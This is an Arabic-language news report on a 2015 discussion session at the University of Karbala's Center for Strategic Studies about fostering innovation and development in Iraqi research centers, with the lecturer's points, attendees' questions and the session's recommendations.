زراعة حضارة التطوير في المراكز البحثية

التعليقات على زراعة حضارة التطوير في المراكز البحثية مغلقة
زراعة حظارة التطوير1

حلقة نقاشية

عقد مركز الدراسات الاستراتيجية في جامعة كربلاء في يوم الاربعاء الموافق 20/5/2015م حلقة نقاشية بعنوان (زراعة حضارة التطوير في المراكز البحثية) وقد

حاضر فيها الاستاذ الدكتور (حسن النجم) عميد كلية الزراعة في جامعة كربلاء ، وقد حضر الحلقة عدد من الباحثين والمختصين وتمت ادارة الحلقة من قبل مدير المركز الدكتور خالد العرداوي من خلال ترحيبه بالضيف والحاضرين وبين مدى الاهمية التي تتمتع بها هذه المراكز البحثية حيث تم وصفها في بريطانيا بأنها (صناديق العقول) ، وفي الولايات المتحدة الامريكية (خزانات المعرفة) ويمكن لهذه المراكز ان ترفد صانع القرار والسياسات العامة في رسم الخطط المستقبلية في ادارة شؤون الدولة .

ثم بدأ المحاضر محاضرته التي بين فيها ان المراكز البحثية لا يمكن ان تنمو دون وجود العوامل المساعدة على نموها وازدهارها مثلها مثل النبات الذي ينمو في الارض ذات التربة الخصبة، فمثلاً مدينة كربلاء المقدسة المزدهرة بالسياحة يجب ان يخصص فيها ما لا يقل عن 10% من ريع الفنادق من اجل البحث العلمي كنوع من النهوض بعمل المراكز البحثية وتقديرا لدورها في التطور المعرفي.

ووضح ايضاً انه من اجل زراعة المراكز البحثية التي تحتوي على نفوس مجددة وواعية وتهيئة الاجواء لنمو البحث والتطوير في الجامعات يجب التفريق بين أربع اشياء هي:

1-   Invention اختراع.

2-   Science العلم.

3-   Engineering الهندسة.

4-   Innovation الابتكار.

فمن اجل خلق مراكز بحثية متطورة لابد ان نخلق داخل الناس تحول نحو الابداع، وهذه الحضارة من اجل خلقها نحتاج الى افراد مؤمنين بها، ولكن لكل مؤسسة مبدعة يجب توافر سبع صفات هي:

1-   Strong leadership committed to innovation القيادة القوية للابتكار.

2-   Minimal hierarchy in decision-making التسلسل الهرمي في صنع القرار.

3-   Commitment to deliverables, implementation الالتزام والانجاز والتنفيذ.

4-   Values disparate talents & entrepreneurship القيم والمواهب المشتركة في ادارة الاعمال.

5-   Ideas, creative and unconventional قيادة ابداعية وغير تقليدية.

6-   Moves quickly and adapts readily.النقل بسرعة والتكيف بسهولة

7-   Willingness to accept failures الاستعداد لقبول الفشل.

ومن اجل تطوير المراكز البحثية لابد ان يكون هناك ترابط بين ستة مفاصل هي:

1-   Individual الفردية.

2-   Organizational المنظمات.

3-   Community المجتمع.

4-   State الدولة.

5-   National الوطن.

6-   World العالم.

وبعد محاضرة قيمة انطوت على معلومات كثيرة انهى الدكتور النجم محاضرته بالأمل في النهوض بواقع المراكز البحثية في داخل وزارة التعليم العالي؛ لتكون هذه المؤسسات لبنة مهمة في النهوض بالعراق وتقدمه الى الأمام شكر مدير الجلسة المحاضر وفتح باب الحوار للسادة الحضور فجاءت مداخلاتهم كما يلي:

• د. سامر عبد اللطيف – باحث في مركز الدراسات القانونية والدستورية في جامعة كربلاء، طرح سؤال حول امكانية اخذ زمام المبادرة واستثمار العقول في البلد عامة وكربلاء المقدسة خاصة؟

فبين د. حسن اننا لا نملك البنية التحتية من اجل بناء هكذا انظمة وهذا ما يعيق استثمار العقول الجيدة والمبدعة.

• د. حسين احمد دخيل – باحث في مركز الدراسات الاستراتيجية في جامعة كربلاء، بين ان هناك فجوة ما بين الادارة في الجامعة وما بين سياستها المتبعة لكونها لا تقيم اعمالها على مدار السنة من خلال معرفة الخدمات التي قدمتها الى المجتمع بعيدا عن تركيزها على معرفة نسبة النجاح والرسوب لدى الطلبة فقط.
  • د. علي أكبر أسدي الباحث في مركز الدراسات الاستراتيجية/ طهران، رأى أن هناك اختلاف واضح ما بين آمال الباحثين وآمال صانع القرار وهناك حواجز بيروقراطية وفي هذا المجال هل هناك معالجة لتطوير العلاقة بين مراكز البحوث وصانع القرار في بلداننا وخاصة العراق وإيران وبالأخص ما يتعلق بمراكز البحوث السياسية والاجتماعية؟

فبين د. حسن له ان إيران تتمتع بالاستقرار أكثر من العراق وهي حالياً تركز اهتمامها على التكنولوجيا وان المفاوض الايراني يتمتع بذكاء واضح من خلال مفاوضات الملف النووي الايراني، وعليكم التركيز على مراكز الابحاث الاجتماعية دون السياسية لتتمكنوا من التحرك بحرية أكثر.

• اما مدير الجلسة فذكر في مداخلته ان هناك مشكلة في عمل المركز البحثية في العراق نلاحظها من خلال وجود أكثر من 130 مركز ضمن تشكيلات وزارة التعليم العالي والبحث العلمي، ولكننا مع ذلك ما نزال في مرحلة التأسيس وليس التطوير لهذه المراكز فنلاحظ ان من يعمل داخل هذه المراكز كمن يحفر بالصخر؛ فكيف نستطيع ان نكسر تصور صانع القرار ورؤيته السلبية لهذه المراكز مع افتقار القيادة المناسبة وافتقار البنية الادارية والقانونية؟

فأجابه د. حسن باننا نعيش حالة إنعاش فلابد ان تعرف ان العراق خرج من مأساة وحرب صعبة جداً هذا من جانب، ومن جانب اخر هناك جهل الحاكم ومحدودية آفاقه وعند تطوير المراكز البحثية لابد من أن ندرك واقعها وتحدياتها التي تواجهها؛ وان الحاجة هي من تصنع مركز الابحاث المبدعة، ومتى ما أدرك صانع القرار والمجتمع أهمية المراكز البحثية في بناء الدولة عندها يمكن لهذه المراكز أن تنتعش في عملها، وهي ملزمة بالنهوض بدورها فزكاة العلم نشره كما يقال.

وخرجت الحلقة النقاشية في ختامها بعدد من التوصيات أبرزها:

1-   ان تكون هناك سلسلة من المحاضرات تعقد بشكل دوري ومستمر من اجل الالمام الكامل بهذا الموضوع ذو الاهمية البالغة من اجل تطوير مراكز الابحاث.

2-   من المفيد عقد لقاءات شهرية ما بين المراكز البحثية جميعاً في عموم الجامعات مع وزير التعليم العالي والبحث العلمي حالها كحال الكليات في الجامعات العراقية.

3-   من المفيد ايضا ان تكون هناك لقاءات كل ستة أشهر بين رئيس الوزراء العراقي ونخبة مختارة من العاملين في المراكز البحثية لمنحه رؤية أوسع حول ادارة الدولة ورسم الساسة العامة واتخاذ القرارات المهمة.

4-   تكاتف المجتمع والحكومة على توفير البنية التحتية لبناء مراكز بحثية مبدعة ستكون له نتائج ايجابية على عمل هذه المراكز، وسيسهم بدور فاعل في تفعيل دورها المعرفي في بناء العراق.

زراعة حظارة التطوير1

زراعة حظارة التطوير2